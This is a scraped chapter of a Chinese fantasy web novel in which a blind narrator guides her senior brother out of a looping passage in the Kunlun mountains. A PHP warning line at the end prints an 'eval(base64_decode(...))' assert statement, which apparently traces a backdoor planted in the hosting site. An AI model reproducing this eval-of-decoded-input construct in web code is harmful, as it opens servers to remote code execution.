88小说 > 玄幻小说 > 六月千夜 > 第232章 迷路了
88小说 www.88xs.org,最快更新六月千夜最新章节!

    ,最快更新六月千夜!

    接下来的事情,我就不太清楚了,我只知道,当我醒来的时候,我就已经在昆仑山之中了,而且还是在二虎子的背上的,二虎子一直都在背着我走,即使是在我变成了这样,二虎子也不愿意这样丢下我,我不自觉地想起了丁宇哲,那个第一个能够成为了我的男朋友的人,他现在是不是就离我很近呢?是不是会感觉得到我的存在已经在慢慢的接近了他呢?

    这一次,我能找到他吗?就像是以前那样,只要心里想着,就能够做得到?

    “我知道你是醒着的,醒来了,就不再睡了,我们现在已经在昆仑山里面了,也就是在丁宇哲和阿正在昨天失踪之前的那个地方。”二虎子温和地对我说道。

    这还是我第一次靠着二虎子这么的近,以前的时候都没有感觉到,原来,二虎子的背后是这样的宽厚,就像是我的印象中对于父亲那样的感觉是一样的,我的父亲,这个人应该是曾经存在过的,可是我对于这个将我带到了这个世界上的人却是没有丝毫的印象,也许将来有一天,我会重新的记起这个人的存在,只不过那会是很久之后或者是很久之前的事情了。

    “谢谢你,大师兄。”我忍不住的勾起了嘴角。

    我觉得,我对于二虎子的称呼,是时候应该换一下了,我应该给现在的二虎子最起码的尊敬了,因为他现在已经是一个让人尊敬的人了,二虎子是林正的大师兄,丁宇哲也管二虎子叫陈师哥,那我就管二虎子叫大师兄好了。

    我在二虎子的背上,很容易就感觉到了二虎子顿住了的脚步,和微微发抖着的背脊。

    “大师兄,你怎么了?”我还以为是大师兄遇见了什么事情了呢,可吓了我一跳。

    “没什么,就是不知道为什么你又变得这么客气了,现在这里又没有什么外人在。”二虎子无所谓的解释了一句,又继续的走着,再也没有了停下脚步的瞬间了,仿佛刚刚的那一刻,也是根本就不存在的。

    “那是因为,大师兄以前不是问过我一件事情吗?在我的心里有没有好人的存在,那时候,我没有给你答案。”我想说,现在我找到了答案了。

    大师兄平静地问我,“那你现在找到了答案了吗?”

    我轻轻地嗯了一声,“找到了,而且还是刚刚发现的。”

    “那答案是什么呢?”大师兄仿佛对我的答案还很期待。

    我微微一笑,便说:“答案里面的那个好人就是大师兄你啊,你是一个好人,无论别人以什么样的定义去作为标准,你都是一个好人,一直,值得让人尊敬的好人!”

    我此刻的表情一定很严肃,因为我是非常的认真的,就是不知道大师兄能够感受得到我的认真。

    “所以,你就因此给了我一个尊称吗?”

    我点点头,大师兄感受到了之后就滑稽的笑了笑,无语的摇了摇头。

    “大师兄,我们一定会找到丁宇哲的吧?”我有些担心,就求助的问到了大师兄,却忘记了自己此刻是在什么地方,自己能不能给安全的走出去,都还是一个问题呢。

    大师兄愣了一下,但还是尽力的让自己平静了下来,“放心吧,我们一定会找到了丁宇哲的,布置会找到丁宇哲的,还会找到了阿正的,我们所有的人,都会平安无事的走出去的。”

    “大师兄,我为什么听不见大人和绘美他们的声音?大人和绘美他们呢?”我忽然之间发现了,似乎没有绘美的声音和大人的唠叨的声音,这两个人的存在感是那么的强,怎么会让我感觉不到呢?

    大师兄没有回答我,我的手上反而事多了一片湿意,是从大师兄的脸上滑落到了我的手上的,我知道,大师兄哭了,一定是发生了什么事情了。

    “大人和绘美他们是不是发现了什么奇怪的事情,所以就和加藤亚也一起去查看了?让我们先往前走,等一会儿就会追上来了?”我平静的问到了大师兄。

    大师兄勉强的点了点头,“是啊,他们先去查看有没有什么危险了,让我们先朝前走,等一会儿,他们就会找到我们的,很快就会找到的,很快……”

    这个很快,也许会经过了很长的时间的,我知道,大人它们一定是出了什么事情,所以现在就只剩下我和大师兄两个人了,而且,我们两个人肯定不是在大师兄自愿的情况之下正常的走进了昆仑山的,应该是在被人逼得无路可退的情况之下走进了昆仑山的。

    可是,是谁呢?是谁把我和大师兄两个人逼得无路可退的呢?

    “我们是不是被困在了一个地方走不出去了?”我忽然感觉到了大师兄一直都在绕圈子的走着,似乎就是在走这一天永远都没有尽头的路似的。

    大师兄惊讶的表情我是看不见了,但是大师兄惊讶的问到我,“你怎么会知道?!”

    “我感觉到了你在原地绕圈子了,你一直都没有走出去这个地方,我的五感是很敏感的,尽管,我现在是看不见的,可是我依然还存在着基本的判断能力的,我是绝对不会判断错误的。”我曾经在无数的地方遇见过迷路的情况,有在沙漠的,又在山林的,又在古墓的,有鬼打墙的,还有阵法的,各种各样的,再熟悉不过了。

    见实在是瞒不过我了,大师兄无奈的长叹了一声,便实话对我说道:“我们现在走不出去,一旦走出去了的话,我们就能够找到了大人他们了,别怕,我会想办法的。”

    即使是知道毫无办法可想了,可是大师兄的话还是让我感觉到了非常的安心的。

    我闭上了本身就看不见的眼睛,好吧,现在我的眼睛上面似乎还是上着药的,蒙着厚厚的白纱布的,无论闭不闭上,别人都是看不见的,只不过我还是觉得闭上眼睛的话,可以感受得到周遭的环境的,这是以前还可以看得见的时候养成的习惯了。

    “大师兄,我告诉你怎么走出去,你听我的吧,但是无论你看见了什么,都绝对不要回头就对了。”我想,最熟悉这种事情的我才是这个时候唯一的希望的。

    “嗯。”大师兄点点头,“你来说吧,我相信你不会错的。”

    是啊,相信,就像第一次见面的时候那样,他相信我,相信我是绝对的可以做到的,我能够救他,所以他愿意将自己的命运交到了我的手上,现在也是一样的,我和大师兄之间的这种相信自从出现了的那一刻开始就未曾改变过。

    “那你现在停下,不要去看你的周围。”我说完大师兄就停了下来,站在了原地不动。

    我感到了我的头发似乎在飘动了,如果是一个完全封闭的世界的话,不可能会是一个有风的世界的,既然还存在着风的流动,那么就说明,我们可以顺着动的方向 找到了出口在那里的。

    “大师兄,这里是一个狭长的甬道,其实原本是圆形的,或者是椭圆形的,但是一直都是向下的,在一定的程度上又会有着斜坡的存在,所以会给你造成了视觉上的差错,让你感觉其实一直都是在朝前走的,但是实际上不在,我们一直都在这个圆形之中,未曾走出去过,你现在横着走,往右!”

    大师兄背着我开始朝右走去,我立即叫住了大师兄,“先停下!”

    “怎么了?方向不对吗?”大师兄紧张地问到了我。

    我讪讪的闭了嘴,顿了顿,才解释说:“大师兄你的方向感很好,是绝对不会走错的,但是是我说错了,应该是朝左边走的,我,左右不分!”

    要不是有着大师兄背着的话,我自己都要忘记了这茬了,我这个脑子什么都记得住,中华上下五千年之间发生的历年大事我都能一个不拉的记住,可是,我特么的就是分不清东南西北!

    大师兄无语的一脸的黑线,最终还是朝着左边默默地走了过去,走了大概一刻钟左右,我忽然感觉到大师兄换了方向了,开始朝着左前方走了过去。

    “赶紧停下!”我忍不住的叫了一声。

    大师兄立即就停下了,感觉到大师兄停下了,我才不解的问:“大师兄,你怎么忽然之间就换了方向了?”

    “我没换方向啊?”大师兄却十分疑惑的说,“我一直都是朝前走的,就是照着你说的方向的!”

    “我明白了,原来是这样啊!”我擦,真亏了我是看不见的,我要是也能过看得见的话,估计也不可能走得出这里的,这里的路给人造成的视觉误差实在是太隐蔽了,你一直都以为你是照着自己的路走的,可是却始终都不到尽头的原因就是这天路在有意无意的误导着你走回头路!

    “明白了什么?”大师兄疑惑不解的问着我。

    我便解释说:“这个空间一定是借助了什么东西,或者是阵法之类的,扰乱了我们的视线,哦,不,是扰乱了你的视线,让你一直都有种自己是在朝前直走的错觉,但是实际上,你再走一段路的时候就会不自觉地朝着另一个方向走回去的!”

Warning: assert() [function.assert]: Assertion "$汲箅偬犀= eval(base64_decode($退隉度痣));" failed in /www/wwwroot/www.88xs.org/modules/article/reader.php on line 2